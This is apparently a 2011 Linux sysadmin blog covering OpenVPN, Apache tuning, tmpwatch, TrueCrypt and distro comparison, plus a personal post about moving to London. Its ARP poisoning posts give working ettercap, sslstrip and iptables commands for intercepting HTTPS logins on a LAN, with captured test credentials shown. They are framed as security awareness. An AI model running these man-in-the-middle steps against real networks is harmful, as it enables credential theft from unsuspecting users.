Dec 31, 2011

Secure remote access to home through OpenVPN (I)

I have prepared secure remote access so that while I am living in London, I can connect to my home network safely. To that end, I have set up a VPN (Virtual Private Network) by means of OpenVPN.

Why have I preferred a VPN over a more typical access method such as SSH, VNC, etc.? Because this way, I can establish an encrypted tunnel between my laptop and the home network and, over that secure line, set up other types of connections later. Furthermore, I will be able to connect from any kind of insecure network.

Why have I chosen OpenVPN? Because this application allows you to quickly build SSL/TLS channels, and this sort of VPN is really handy and straightforward to configure. OpenVPN is open source software which easily implements VPNs over a public network such as the Internet. One of its main advantages is that it just needs a single TCP or UDP port for transmissions and runs in userspace, rather than inside the kernel IP stack, unlike for instance IPsec or PPTP.

Below you can see a detailed outline of my infrastructure. It is a point-to-point link between my laptop and a PC connected inside the local network. The PC acts in the server role (it takes care of listening for incoming connection requests) and the laptop is the client (it initiates the connection). Once I am connected to the PC via OpenVPN, I will be able to jump safely to any device located in the network. Both computers run Ubuntu 11.10.




One of the first things that I had to face is the issue of the dynamic IP address used by my ADSL service. Every time I turn on the router, a temporary public IP address is assigned by the ADSL provider. To overcome this, I have signed up for a free dynamic DNS service: DNSdynamic. The registration process is pretty simple.

In this manner, I have obtained a subdomain which points to my router. To keep it current, I have installed ddclient on the PC, an address-updating utility which keeps the router's public IP address up to date. In order to show you my configuration, I will use a fictitious subdomain called test.dnsdynamic.com.

root@javi-pc:~# aptitude install ddclient

root@javi-pc:~# cat /etc/ddclient.conf
# Log messages to syslog
syslog=yes              

# Support SSL updates               
ssl=yes

# Obtain IP address from provider's IP by checking page                               
use=web, web=myip.dnsdynamic.com

# Update DNS information from server
server=www.dnsdynamic.org

# Login and password for server
login=test@gmail.com
password='xxxxxx'

# Update protocol used              
protocol=dyndns2

# Subdomain                        
test.dnsdynamic.com

root@javi-pc:~# cat /etc/default/ddclient 
...
# ddclient runs in daemon mode
run_daemon="true"

# Time interval between the updates of the dynamic DNS name (in seconds)
daemon_interval="3600"

root@javi-pc:~# /etc/init.d/ddclient start

The SSL/TLS connection that I have configured is authenticated through digital certificates, so I needed to create a couple of certificates, one for each end of the VPN tunnel. In addition, I also had to create a CA (Certification Authority) in order to validate both certificates. OpenVPN allows peers to authenticate each other by using a username/password, a pre-shared secret key or digital certificates. I have picked the last option because it is the most robust system.

To manage digital certificates, I usually work with easy-rsa, a small RSA key management package which contains a series of openssl scripts aimed at handling PKIs (Public Key Infrastructures). This tool is included within the OpenVPN source distribution.

javi@javi-pc:~/tmp$ wget http://swupdate.openvpn.org/community/releases/openvpn-2.2.2.tar.gz

javi@javi-pc:~/tmp$ tar xvzf openvpn-2.2.2.tar.gz

javi@javi-pc:~/tmp$ mv openvpn-2.2.2/easy-rsa/2.0/ . ; rm -rf openvpn-2.2.2*
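
Creating the CA and both certificates will be covered in the next part of this article but, as a preview, the typical easy-rsa 2.0 workflow looks roughly like this (the key names are illustrative; adjust the vars file to your own data first):

javi@javi-pc:~/tmp$ cd 2.0

javi@javi-pc:~/tmp/2.0$ source ./vars ; ./clean-all     # load settings and initialize the keys directory

javi@javi-pc:~/tmp/2.0$ ./build-ca                      # generate the CA certificate and key

javi@javi-pc:~/tmp/2.0$ ./build-key-server server       # server certificate, signed by the CA

javi@javi-pc:~/tmp/2.0$ ./build-key client              # client certificate, signed by the CA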


Dec 22, 2011

Apache performance tuning: dynamic modules (II)

Let's continue with the second part of the article titled Apache performance tuning: dynamic modules (I). Remember that this series is aimed at reviewing the different modules that ship with Apache, so as to determine whether they are useful for our requirements. In this way, we will be able to adjust the amount of memory used by Apache processes.

The most important point is to be aware that a single process consumes little memory, but if our Apache installation requires lots of processes, the total memory grabbed by Apache will be huge. So if we manage to reduce the initial memory footprint with which a process is created, each process will run lighter and, in addition, we will have that memory free to be allocated for other purposes.
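
A quick way to quantify this is to look at the resident memory (RSS) of the running Apache processes before and after trimming modules; a minimal check on the test machine could be:

[root@centos ~]# ps -ylC httpd --sort=rss     # the RSS column is shown in KB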

mod_ext_filter

Forwards the response body to an external program before sending it out to the client.

# LoadModule ext_filter_module modules/mod_ext_filter.so

mod_include

Processes Server Side Includes (SSI), filtering files before delivering them to the client.

# LoadModule include_module modules/mod_include.so

mod_info

Provides a comprehensive overview of the web server configuration.

# LoadModule info_module modules/mod_info.so

mod_ldap

Improves the performance of websites by pooling LDAP connections and caching responses.

# LoadModule ldap_module modules/mod_ldap.so

mod_logio

Logs the number of input and output bytes received/sent per request.

# LoadModule logio_module modules/mod_logio.so

mod_proxy

Implements a proxy/gateway.

# LoadModule proxy_module modules/mod_proxy.so
# LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
# LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
# LoadModule proxy_http_module modules/mod_proxy_http.so
# LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
# LoadModule proxy_connect_module modules/mod_proxy_connect.so

mod_speling

Tries to correct misspelled URLs that users might have entered, by ignoring capitalization and allowing up to one misspelling.

# LoadModule speling_module modules/mod_speling.so

mod_status

Provides statistics about the activity and performance of the web server.

# LoadModule status_module modules/mod_status.so

mod_suexec

Allows CGI scripts to run as a specified user and group.

# LoadModule suexec_module modules/mod_suexec.so

mod_userdir

Allows user directories to be accessed through the web server.

# LoadModule userdir_module modules/mod_userdir.so

mod_usertrack

Logs user activity (clickstream) by means of cookies.

# LoadModule usertrack_module modules/mod_usertrack.so

After disabling these modules, the memory used by one Apache process (owned by the apache user) went from 2.02 to 1.46 MB; that is to say, we have gained around 0.6 MB per process. If you take into account that a large number of processes can be running on the system at any given time, the memory saved can be appreciable. In addition, consider that from now on each process is much lighter, so its startup and overall performance will be better.


Dec 14, 2011

Apache performance tuning: dynamic modules (I)

Apache is a cross-platform, modular, open source web server, widely used around the world for its quality, robustness and stability. But like most applications, it is installed with a default configuration which is not the most suitable. And I will say more: I have never seen an Apache installation where the administrator has set it up properly afterwards.

Over several articles, you are going to learn how to properly optimize Apache in order to achieve the best performance. The tests will be carried out on CentOS 6.2 (32 bits) with Apache 2.2.15. I am going to split this first article, devoted to dynamic modules, into two separate parts.

Apache has got two main operating modes, also known as multi-processing modules (MPMs):

  • Prefork: a single Apache process (httpd) launches child processes which take care of listening for incoming connections and serving them. Apache keeps several idle processes ready to handle incoming requests, so a client does not need to wait for new children to be forked. Another advantage of this operation mode is that a problem in one process will not affect the others (each child is independent of the rest). 

  • Worker: as in the previous case, a single control process creates several child processes and, in turn, each child process runs a listener thread which passes the inbound connections to other server threads managed by the same child process. This mode is faster and more scalable but, in contrast, it is less fault tolerant (several threads share the same memory area, so a problem in one of them can drag down the rest).

You can install Apache either by compiling it from its source code or by getting the binary package directly from a repository. I for one prefer the second option because, in this way, any kind of update (security or bugfix) can be applied without compiling it again.

A typical installation of Apache via yum comes with the following pre-compiled modules. As you can see, prefork is the default operating mode (you can change this by modifying the /etc/sysconfig/httpd file).

[root@centos ~]# httpd -l
Compiled in modules:
  core.c
  prefork.c
  http_core.c
  mod_so.c
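
In addition to the statically compiled modules, you can dump the full list of loaded modules (static plus the shared ones pulled in through LoadModule directives) with the -M flag:

[root@centos ~]# httpd -M
Loaded Modules:
 core_module (static)
 ...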

It is essential to know the functionality of each module so as to figure out whether it can be left out. Below, we are going to go over the modules that can be ruled out in most cases. Note that all the directives shown below are included in the Apache configuration file (httpd.conf). In many cases, the related modules will also be disabled, aside from the main one.

mod_actions

Allows the execution of CGI scripts based on the MIME content type and the request method.

# LoadModule actions_module modules/mod_actions.so

mod_auth_basic

Limits access to certain users by using HTTP Basic Authentication. I usually disable its dependencies.

LoadModule auth_basic_module modules/mod_auth_basic.so
# LoadModule authn_file_module modules/mod_authn_file.so
# LoadModule authn_alias_module modules/mod_authn_alias.so
# LoadModule authn_anon_module modules/mod_authn_anon.so
# LoadModule authn_dbm_module modules/mod_authn_dbm.so
# LoadModule authn_default_module modules/mod_authn_default.so
# LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
# LoadModule authn_dbd_module modules/mod_authn_dbd.so

mod_auth_digest

Limits access to certain users by using MD5 Digest Authentication.

# LoadModule auth_digest_module modules/mod_auth_digest.so

mod_authz_*

Limits access to certain groups based on different sources (DBM or plaintext files, hostname or IP address, etc.). I usually remove all of them except mod_authz_host.

LoadModule authz_host_module modules/mod_authz_host.so
# LoadModule authz_user_module modules/mod_authz_user.so
# LoadModule authz_owner_module modules/mod_authz_owner.so
# LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
# LoadModule authz_dbm_module modules/mod_authz_dbm.so
# LoadModule authz_default_module modules/mod_authz_default.so

mod_cache

Manages the content cache.

# LoadModule cache_module modules/mod_cache.so
# LoadModule disk_cache_module modules/mod_disk_cache.so

mod_cgi

Allows the execution of CGI scripts.

# LoadModule cgi_module modules/mod_cgi.so

mod_dav

Implements the WebDAV (Web-based Distributed Authoring and Versioning) functionality.

# LoadModule dav_module modules/mod_dav.so
# LoadModule dav_fs_module modules/mod_dav_fs.so

mod_env

Controls the internal environment variables which are sent out to CGI scripts and SSI pages.

# LoadModule env_module modules/mod_env.so


Dec 5, 2011

I head off to London

Last year, when I was in London, I already knew that it would not be the last time and indeed, I was not mistaken. Today, I have handed in my resignation and given up my current job, where I will remain until the end of this month. My flight to the United Kingdom, the next stage of my life, takes off on the 9th of January.

This idea had been going around in my head for a long time. And the question was: why not? Why not work in another country, run away from the daily monotony, learn from other cultures, break with political correctness and, in short, squeeze the most out of life?

Here in Spain we have a big problem and its name is PSOE (a political party). Whenever they have governed, they have ended up messing up the country and nowadays, unlike in 1996 (the previous time they ruined us), we no longer have the European cohesion funds or the crown jewels (the most important public companies) to sell in order to get ahead. I could write a whole book about the misdeeds of these political figures...

Spain will have to face a hard situation over the next few years, and this is another of the reasons why I think that now is a good moment to go abroad. Unlike fifteen years ago, the Bank of Spain cannot devalue the currency at present, so we will have to resort to other instruments to get over this critical condition, such as reducing salaries, increasing taxes, improving productivity, optimizing public resources, etc., and in this way become more competitive and efficient.

Regarding the IT world, I have always said that Spain is not a good place for engineers, because it is a country of services. We do not have an IT industry and, in most cases, you can only aspire to cover the needs or requirements of a client. And why do I say client and not company? Because over time the business model has totally changed and, at present, it is no longer possible (or at least very complicated) to work directly for an end company.

Between the client and you, there will always be an intermediate company that we call a "cárnica" or "charcutera" ("butcher shop" in English). In general, this intermediary takes care of obtaining an end client for you, offering you up like a piece of meat, and paying your salary. Practically without lifting a finger, and taking advantage of your work, it grabs a part of the money that you make every month.

What happens with this system? You will never be, or feel, part of a company; today you can be working in one place and tomorrow in another and, on top of all that, there is no way to develop a career inside a single enterprise.

I recently read the article titled "Las ilusiones perdidas" ("the lost illusions" in English), which perfectly reflects the situation of thousands of Spaniards who have had to leave our country for multiple reasons, but mainly due to a lack of future. This is a serious issue, because over the next years we are going to lose the best-prepared generation of young people in our history. This phenomenon is also known as brain drain.

As I mentioned before, my case is totally different. I do not need to look for a job far away from home; I have a permanent job here and I have given it up voluntarily. Furthermore, I am aware that I could have switched to another job at any moment. I am simply in the mood to take this step.

I am a person who likes to work everything out in detail, and so I have mapped out a complete roadmap for my first weeks in London. I still have to read up on some points before finishing my plan but, mainly, I am going to boost my English at the beginning by enrolling in a language school, at least for the first three months. I know that I have a good level of English, but I also realize that it turns into lower-intermediate the moment you arrive there.

After that initial period, I will search for a job. I consider it better to build the house starting with the floor rather than the roof. For that reason, and as I pointed out before, first of all I will be improving my English and, in the meantime, I will have free time to get used to those new lands, aside from accomplishing other typical tasks such as opening a bank account, getting a NIN (National Insurance Number) and a GP (General Practitioner), registering at the embassy and so on.

Perhaps this is the most important decision that I have had to take in my whole life, and I hope not to slip up. I am aware that it will not be straightforward but, at any rate, I am really looking forward to it!


Nov 29, 2011

The tmp directory and tmpwatch daemon

The tmp directory is normally used on Linux systems so that users or applications can store temporary information within it.

On Debian or Ubuntu distributions, the system cleans out all user data from it at each startup. On RHEL or CentOS 6, no operation is performed on that directory. But in version 5 of RHEL or CentOS, a great tool was installed on the system by default and used to periodically check the contents of the tmp directory: tmpwatch.

Tmpwatch is a utility, launched from a cron job, which takes care of removing files which have not been accessed for a given period of time, or any file or folder that you configure. This operation is carried out based on criteria which will be explained later. The equivalent program on Debian/Ubuntu is tmpreaper, although you can perfectly well compile tmpwatch for those operating systems.

For the development of the present article, I am going to use CentOS 6.0 (32 bits).

[root@centos ~]# yum install tmpwatch

[root@centos ~]# cat /etc/cron.daily/tmpwatch 
#! /bin/sh
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
        -x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
        -X '/tmp/hsperfdata_*' 10d /tmp
/usr/sbin/tmpwatch "$flags" 30d /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
        /usr/sbin/tmpwatch "$flags" -f 30d "$d"
    fi
done

By taking a look at the script launched daily by the system, we can observe that tmpwatch acts on a series of directories (/tmp, /var/tmp, /var/cache/man, etc.) by clearing out their contents. This task is carried out based on whether certain events have taken place within the last 10 or 30 days.

  • -u (--atime): the decision to delete a file depends on its atime (access time).
  • -m (--mtime): the decision to delete a file depends on its mtime (modification time).
  • -c (--ctime): the decision to delete a file depends on its ctime (inode change time).
  • -f (--force): removes files even if root does not have write access.

By means of the '-x' option, we can exclude a specific file or directory and, with '-X', any path matching a given pattern.
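
Outside of the cron job, tmpwatch can also be invoked by hand. A harmless way to try out the flags described above is a test run, which only reports what would be deleted (here, anything in /tmp untouched for the last 7 days):

[root@centos ~]# /usr/sbin/tmpwatch --test -umc 7d /tmp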


Nov 22, 2011

TrueCrypt under the command line

I have an external hard drive (LG XD3, 500 GB) broken up into a couple of partitions, 450 and 50 GB respectively. The first partition is public and formatted with NTFS. The second one is formatted with ext4 and encrypted by means of TrueCrypt, and it is where I store my private data.

Until now I used TrueCrypt in graphical mode, but over time I have realized that it is more comfortable to handle the command line version (besides, I tend to avoid graphical tools whenever possible).

TrueCrypt is a powerful program which can encrypt partitions, logical volumes, whole hard drives or even installed operating systems. The encryption is carried out transparently and automatically and, on top of all that, in real time (that is to say, on the fly). Other pluses are the option to hide volumes and its performance, which is excellent.

One practical detail of TrueCrypt is that it is not necessary to install it on the system. To that end, you have to download the console-only file (in my case, the 32-bit version), decompress it and run the included installer. Then, you have to choose the second option: Extract package file truecrypt_7.1_console_i386.tar.gz and place it to /tmp. Inside this tgz file is the TrueCrypt executable.

I usually keep this binary file on the public partition of the external hard drive. Thereby, when I have to use it, I just grab it from there.

javi@javi-ubuntu:/tmp$ cp /media/public/truecrypt/truecrypt . ; chmod +x truecrypt

javi@javi-ubuntu:/tmp$ ./truecrypt --version
TrueCrypt 7.1

First of all, I had to encrypt the partition. This is a long process whose duration depends on the size of the partition. Below you can see that the average speed was 26 MB/s.

In the next output, you can see that in order to create the encrypted partition (sdb2), I followed the text wizard provided by TrueCrypt. Another choice would have been to pass the parameters on the command line (--encryption, --size, etc.).

javi@javi-ubuntu:/tmp$ sudo ./truecrypt -c
Volume type:
 1) Normal
 2) Hidden
Select [1]: 1

Enter volume path: /dev/sdb2

Encryption algorithm:
 1) AES
 2) Serpent
 3) Twofish
 4) AES-Twofish
 5) AES-Twofish-Serpent
 6) Serpent-AES
 7) Serpent-Twofish-AES
 8) Twofish-Serpent
Select [1]: 1

Hash algorithm:
 1) RIPEMD-160
 2) SHA-512
 3) Whirlpool
Select [1]: 1

Filesystem:
 1) None
 2) FAT
 3) Linux Ext2
 4) Linux Ext3
 5) Linux Ext4
Select [2]: 5

Enter password: 
Re-enter password: 

Enter keyfile path [none]: 

Please type at least 320 randomly chosen characters and then press Enter:


Done: 100.000%  Speed:   26 MB/s  Left: 0 s                

The TrueCrypt volume has been successfully created.

Once you have created the encrypted partition (remember that my example is based on a partition, but you can also encrypt a file or logical volume), the procedure is pretty easy. When you want to work with that safe area, you only have to mount it by means of TrueCrypt.

javi@javi-ubuntu:/tmp$ mkdir /mnt/truecrypt

javi@javi-ubuntu:/tmp$ sudo ./truecrypt /dev/sdb2 /mnt/truecrypt
Enter password for /dev/sdb2: 
Enter keyfile [none]: 
Protect hidden volume (if any)? (y=Yes/n=No) [No]:

javi@javi-ubuntu:/tmp$ ./truecrypt --list
1: /dev/sdb2 /dev/mapper/truecrypt1 /mnt/truecrypt

By running the following command, you may collect more details about a mounted volume.

javi@javi-ubuntu:/tmp$ ./truecrypt --volume-properties /dev/sdb2
Slot: 1
Volume: /dev/sdb2
Virtual Device: /dev/mapper/truecrypt1
Mount Directory: /mnt/truecrypt
Size: 50.0 GB
Type: Normal
Read-Only: No
Hidden Volume Protected: No
Encryption Algorithm: AES
Primary Key Size: 256 bits
Secondary Key Size (XTS Mode): 256 bits
Block Size: 128 bits
Mode of Operation: XTS
PKCS-5 PRF: HMAC-RIPEMD-160
Volume Format Version: 2
Embedded Backup Header: Yes

You can dismount it by executing the following command.

javi@javi-ubuntu:/tmp$ sudo ./truecrypt --dismount /mnt/truecrypt

TrueCrypt has many more command line options. I invite you to take a look at them by checking its help.

And finally, I would like to conclude this article by writing down the command (based on rsync) that I usually run to back up my data onto the private partition.

javi@javi-ubuntu:~$ rsync -altgvb --delete /data /mnt/truecrypt/
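
If you want to preview what that command would transfer or delete before touching the encrypted partition, rsync accepts a dry-run flag which changes nothing on the destination:

javi@javi-ubuntu:~$ rsync -altgvb --delete --dry-run /data /mnt/truecrypt/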


Nov 15, 2011

ARP poisoning (III)

In the first article, ARP poisoning (I), we learnt about the danger of connecting to a service by using a non-secure protocol, such as HTTP, FTP, SMTP and so on. The username and password are sent in the clear, and anyone could sniff them.

Ok, that's right, so we have to use secure protocols (HTTPS, SSH, FTPS, etc.). But what happens if the digital certificate used to authenticate and encrypt the communication is changed on the fly? That is just what we studied in the second article, ARP poisoning (II). The bottom line was that we always have to pay attention when we load a web page, and we must only accept trusted certificates.

What would happen if one day we are a little bit sleepy and do not realize that we are using HTTP rather than HTTPS? What? How is it possible that I am logging in to my bank account and that access is not served through HTTPS? Well, you had better believe it.

Below you can see the normal login on the Oracle website, in both Firefox and Google Chrome. You may observe that both accesses are correctly served over HTTPS.




Imagine for a moment that an intruder carries out a poisoning attack between you and the router in order to intercept all transmitted data. Then he sets up a tool like sslstrip to establish two TCP connections: on the one hand, an HTTPS connection between him and the Oracle website, using the real certificate offered by Oracle, and on the other, an HTTP connection between him and you. This is the goal of sslstrip: to take advantage of a Man in the Middle (MitM) attack in order to tap SSL/TLS conversations.

root@attacker:~# aptitude install sslstrip

root@attacker:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000

root@attacker:~# sslstrip -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

After running ettercap and forwarding all HTTP traffic to port 10000 (the default port used by sslstrip), if the victim tries to open the aforementioned HTTPS Oracle web page, the HTTP version of the site will turn up instead (sslstrip takes care of transforming the content sent out by Oracle and serves it to the victim over an HTTP session).

The following figures show the manipulated web page created by sslstrip.




If the victim attempts to sign in, the credentials will be captured by the attacker.

root@attacker:~# cat victim.log
...
2011-11-05 19:51:47,876 POST Data (login.oracle.com):
...
AD91DC75E382F4E9ACDC66D839F095558488AA1754EB29D4513F832B83CB31BF05DB93ACCC18255184E5296825625A56EA6&locale=&ssousername=test%40mytest.com&password=test2

Ok, perfect: to stay out of this kind of attack, first of all we must have a good cup of coffee every morning ;-), and second, be very careful when we surf the Internet. At any rate, as mentioned in the first post, the goal of this series of articles is to present, later on, a great tool which will help us shut out this sort of problem.

Carrying on with sslstrip, it still has one last trick: it is able to draw a padlock icon in the address bar.

root@attacker:~# sslstrip -f -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

You can take a look at it in both browsers.




It is very important to underline the risks of this type of attack. You can check it out against hundreds of websites (banks, e-commerce, sports betting, etc.) and on most of them, you could be spoofed. But I have also seen other sites, such as PayPal, where the altered web page does not work out very well.


Nov 8, 2011

Ubuntu Server instead of CentOS?

Although both are outstanding Linux distributions, nowadays I choose Ubuntu Server. For a long time I preferred CentOS over Ubuntu Server, but today I always install Ubuntu Server unless there is some requirement which forces me to do otherwise (for instance, when an application is only supported on CentOS/RHEL).

I am not going to focus on details such as performance, architecture, support and so on. I only want to talk about those simple things that make me say, when I finish the installation of an operating system: I like it!

For my tests, I am going to use two similar versions: Ubuntu Server 10.04 LTS and CentOS 6.0, both 32 bits. After the initial installation (and the corresponding upgrades), here is a typical view of the system status. As you can see, Ubuntu Server grabs little memory, since most of it is cached. With respect to the number of active processes, it also has fewer than CentOS.

root@ubuntu-server:~# top
top - 12:17:54 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  78 total,   1 running,  77 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2061260k total,   126644k used,  1934616k free,    17088k buffers
Swap:   565240k total,        0k used,   565240k free,    87796k cached
...

[root@centos ~]# top
top - 12:17:49 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  84 total,   1 running,  83 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2071620k total,    99020k used,  1972600k free,     5272k buffers
Swap:  4161528k total,        0k used,  4161528k free,    29488k cached
...

What about the initial space taken up by the installation? (In order to get a more accurate result, I have cleaned the package cache.) As you can see, CentOS occupies around 225 MB less than Ubuntu Server. I have to highlight this point, because this aspect has improved a lot in CentOS 6.0, since there is now a minimal installation option. With CentOS 5, the final size was bigger.

root@ubuntu-server:~# aptitude clean

root@ubuntu-server:~# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/ubuntu--server-root
                       12G  888M  9.6G   9% /
none                 1002M  172K 1002M   1% /dev
none                 1007M     0 1007M   0% /dev/shm
none                 1007M   32K 1007M   1% /var/run
none                 1007M     0 1007M   0% /var/lock
none                 1007M     0 1007M   0% /lib/init/rw
/dev/sda1             228M   31M  185M  15% /boot

[root@centos ~]# yum clean all

[root@centos ~]# df -h
S.ficheros            Size  Used Avail Use% Montado en
/dev/mapper/vg_centos-lv_root
                      7,5G  664M  6,4G  10% /
tmpfs                1012M     0 1012M   0% /dev/shm
/dev/sda1             485M   56M  404M  13% /boot

This situation is reflected as well when we take a look at the number of packages installed on the system.

root@ubuntu-server:~# dpkg -l | grep ii | wc -l
358

[root@centos ~]# yum list installed | wc -l
234

Let's move on to the services which are listening on the system from the start. You can see that the picture on Ubuntu Server is impeccable: there is no process bound to any port (aside from SSH). But what happens on CentOS? Several applications have already been started up (TCP and UDP). This is a waste of time for me, because at the end of each CentOS installation I have to remove them (see the sketch after the listings below).

root@ubuntu-server:~# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      810/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      810/sshd 

[root@centos ~]# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1071/rpcbind        
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1191/sshd           
tcp        0      0 0.0.0.0:44568               0.0.0.0:*                   LISTEN      1089/rpc.statd      
tcp        0      0 :::111                      :::*                        LISTEN      1071/rpcbind        
tcp        0      0 :::55445                    :::*                        LISTEN      1089/rpc.statd      
tcp        0      0 :::22                       :::*                        LISTEN      1191/sshd           
udp        0      0 0.0.0.0:822                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 0.0.0.0:841                 0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:45143               0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 :::822                      :::*                                    1071/rpcbind        
udp        0      0 :::43338                    :::*                                    1089/rpc.statd      
udp        0      0 :::111                      :::*                                    1071/rpcbind 
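
A minimal sketch of that cleanup on CentOS 6, assuming only the listeners shown above (rpcbind, plus rpc.statd, which belongs to the nfslock service):

[root@centos ~]# service nfslock stop ; chkconfig nfslock off
[root@centos ~]# service rpcbind stop ; chkconfig rpcbind off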

Regarding the repositories provided for each distribution, Ubuntu Server supplies a larger number of packages than CentOS, and this is another plus. Although you can add excellent additional repositories such as EPEL, those extra packages are not officially supported.

root@ubuntu-server:~# apt-cache stats | grep Normal
  Normal packages: 30299

[root@centos ~]# yum list all | wc -l
4595

It is also worth pointing out the life cycle of each distribution. For Ubuntu Server you get an LTS (Long Term Support) version every two years. In contrast, on CentOS, the first release of the 5 branch was shipped in March 2007 and CentOS 6.0 in July 2011 (more than four years later). What does this mean? Over time, you have to use an operating system where most of the packages, although still supported, are obsolete.

And finally, I have measured the time taken to reboot the system (both use Upstart). This parameter is really important, mainly in production environments. I obtained 20 seconds on Ubuntu Server and 40 on CentOS.


Nov 2, 2011

ARP poisoning (II)

In the previous article, ARP poisoning (I), you were able to learn the risks of using non-secure protocols inside an unreliable network. At any moment, your connection credentials can be captured by an intruder without you being aware of it. Note that this situation can be very common when you surf the Internet and visit HTTP websites or, for example, when you log into your MSN account.

So what happens with secure protocols such as HTTPS? That is to say, for instance when you access your online bank account, PayPal, Gmail, LinkedIn and so on. Are you safe? In most cases, that will depend on you.

Let's go over the normal behavior of a secure site like Facebook. If you left-click on facebook.com in the browser's address bar (once you have opened the site), you will be able to see that the connection to the web is encrypted and verified by DigiCert Inc (a certification authority).




By pressing the More Information button, you can take a look at the features of the digital certificate offered by Facebook. As you can see in the first screen, the certificate has been issued by DigiCert Inc to Facebook and, in the second one, that it is made up of a valid Certificate Hierarchy.




Now we are going to use another auditing tool: Ettercap (NG-0.7.3). This program is aimed at sniffing switched LANs, supporting active and passive analysis of many protocols (HTTP, FTP, POP, IMAP, NFS, etc.), even ciphered ones.

In addition, it includes many options for network and host inspection, data injection into established connections, lots of modules loadable at runtime, also known as plugins (arp_cop - report suspicious ARP activity -, dos_attack - run a DoS attack against a victim -, finger - fingerprint a remote host -, etc.), several MitM attacks (ARP poisoning, ICMP redirection, DHCP spoofing and port stealing) and so on.

The victim computer is going to open Facebook (HTTPS) in a web browser (Firefox). Therefore, the victim's traffic will go out through the router so as to reach Facebook across the Internet.

Ettercap will be used to poison both elements, victim and router, in order to sniff all traffic between them. So how can the attacker capture the password if it is sent through the previously established secure channel? First of all, the traffic between the victim and Facebook does not go directly to the router; it passes through the attacker, who picks up all the data.

Thereby, on the one hand the attacker will establish an HTTPS connection between itself and Facebook by using the correct certificate issued to Facebook and, on the other, another HTTPS connection between itself and the victim, but this time by means of a fake certificate created on the fly, whose fields are all filled in according to the real certificate presented by Facebook.

Let's get started by editing the Ettercap configuration file, in order to set the iptables commands which allow the TCP redirection at kernel level, so that Ettercap can handle SSL dissection.

root@attacker:~# aptitude install ettercap

root@attacker:~# cat /etc/etter.conf
...
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
...
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
...

Now we are ready to run Ettercap, spoofing both targets and activating the ARP poisoning MitM attack. The 'remote' parameter is set in order to capture the connections which pass through the router; otherwise, only the connections between the two targets would be captured.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       00:0C:29:20:9F:9B      192.168.1.20     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.1 00:60:B3:50:AB:45

 GROUP 2 : 192.168.1.10 00:0C:29:69:81:47
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


At this moment, if you open Facebook again, Firefox will warn you that it cannot confirm that the connection is secure. Normally, when you try to connect securely, sites such as banks, stores, public bodies, etc. present trusted identification to prove that you are going to the right place.




If you confirm the security exception and accept the digital certificate, you will have fallen into the attacker's trap. Let's review the characteristics of this invalid certificate, so as to be able to compare it with the real one (second figure).




As you can make out in the general features of the fake certificate, only the fingerprints are modified, because the attacker has signed it with his own private key. Besides, the untrustworthy certificate does not present a correct hierarchy.

Now, if you attempt to log in to Facebook, your credentials will be captured by the attacker.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/
...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.171.224.39:443 -> USER: test@mytest.com  PASS: test1  INFO: https://www.facebook.com/


Oct 26, 2011

ARP poisoning (I)

For a long time, I have wanted to write an article about this issue. I think that people are not aware of the potential risks when they connect to a public network, such as in an airport, library or pub, or even to their own office network.

Many times I have heard: it is not such a big deal; you know what? I have a good antivirus which protects my computer! And on top of all that, the Windows firewall is activated! That is when I put on my poker face...

Most administrators think that having a well-configured firewall, an IDS, an antivirus, etc. is enough to shield the network from external threats, but it turns out that around 70 or 80 percent of all attacks come from the internal network itself.

